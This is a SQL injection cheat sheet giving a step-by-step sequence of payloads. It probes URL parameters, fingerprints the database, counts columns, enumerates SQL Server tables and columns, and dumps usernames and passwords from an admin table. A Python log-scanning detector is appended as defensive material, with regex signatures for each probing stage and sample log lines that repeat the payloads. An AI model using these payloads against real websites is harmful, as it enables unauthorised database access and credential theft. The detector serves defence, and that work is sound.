1. Determine whether the site is an injection point
① URLs containing a *=variable-name parameter
Integer:
www.target.com/1.php?id=88          normal
www.target.com/1.php?id=88-0        same as above
www.target.com/1.php?id=88-1        abnormal
String:
www.target.com/1.php?id=88' And 'a'='a          normal
www.target.com/1.php?id=88' And 'a'='b          abnormal
String:
www.target.com/1.php?id=88          normal
www.target.com/1.php?id=88'%2b'     same as above
www.target.com/1.php?id=88'%2b's    abnormal
2. Determine which type of database it is
Database identification
MySQL
/*!%20s*/            error means MySQL
/*!40000%20s*/       error means version greater than 4.0 (above 4.0 supports UNION injection)
/*!60000%20s*/       normal means version less than 6.0
/*!50130%20s*/       error means version is 5.1.30
/*pc*/               // normal means MySQL
supports --pc, does not support ;      // Oracle
and exists(select @@version)--         // normal means SQL Server
Determine the number of columns
Finding the number of columns for displaying database information
id=1/**/Order/**/By/**/5/**/--          normal means column count ≥ 5
id=1/**/Order/**/By/**/6/**/--          error means column count < 6
Determine the column data types
id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--
id=1/**/union/**/all/**/select/**/NULL,NULL,'test',NULL,NULL--
If this returns normally, column 3 is a string type and can display the injected SQL data.
Display the database version
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--
Current database name
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--
Table names of a specified database (replace 庫名 with the database name)
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from庫(kù)名..sysobjects where xtype='u' and name not in(select top 0 name from 庫(kù)名..sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
Query table names in the current database
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 1 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
Column names
Starting from 0 and incrementing the number in the second top N enumerates the column names of the admin table.
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
Column values
id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--
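From the defender's side, the probing stages listed above (version-comment fingerprinting, /**/ in place of spaces, ORDER BY column counting, UNION SELECT NULL rows, the ' And 'a'='a tautology and the SQL Server catalog views) leave recognisable traces in web-server logs. The following Python detector is an added example, not part of the original cheat sheet; the log lines are constructed samples and the signature names are my own.

```python
from __future__ import annotations
import re
from urllib.parse import unquote
# Constructed sample access-log lines ("METHOD PATH STATUS"), not taken from the page.
SAMPLE_LOG = """\
GET /1.php?id=88 200
GET /1.php?id=88-1 500
GET /1.php?id=88'%20And%20'a'='a 200
GET /1.php?id=1/*!40000%20s*/ 500
GET /1.php?id=1/**/Order/**/By/**/6/**/-- 500
GET /1.php?id=1/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL-- 200
GET /1.php?id=1%20and%201=2%20union%20all%20select%20id,username,password,NULL,NULL%20from%20admin-- 200
GET /products.php?id=42 200
"""
# One signature per probing stage of the cheat sheet; hits are reported in this order.
SIGNATURES = [
    ("mysql_version_comment", re.compile(r"/\*!\d{0,5}\s")),                 # /*!40000 s*/
    ("inline_comment_whitespace", re.compile(r"/\*\*/")),                    # /**/ in place of spaces
    ("tautology_string", re.compile(r"'\s*and\s*'[^']*'\s*=\s*'", re.I)),    # ' And 'a'='a
    ("and_1_eq", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),               # and 1=2 before a UNION
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),             # column-count probing
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),      # UNION SELECT NULL,...
    ("mssql_catalog", re.compile(r"sysobjects|syscolumns|db_name\(\)|@@version", re.I)),
]

def scan_request(path: str) -> list[str]:
    """Return the names of all signatures matching one (URL-encoded) request path."""
    decoded = unquote(path)
    # /**/ replaces spaces when the application strips them; collapse it back to a
    # space so the keyword signatures still fire on the de-obfuscated query.
    normalized = re.sub(r"/\*\*/", " ", decoded)
    hits = []
    for name, pattern in SIGNATURES:
        target = decoded if name == "inline_comment_whitespace" else normalized
        if pattern.search(target):
            hits.append(name)
    return hits

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan 'METHOD PATH STATUS' lines and return (path, hits) for flagged lines only."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and (hits := scan_request(parts[1])):
            flagged.append((parts[1], hits))
    return flagged

if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG):
        print(f"{path}\n    -> {', '.join(hits)}")
```

The integer probe (id=88-0 versus id=88-1) is indistinguishable from a normal request on a single line and needs a baseline comparison of responses rather than a signature; everything else on the page is caught.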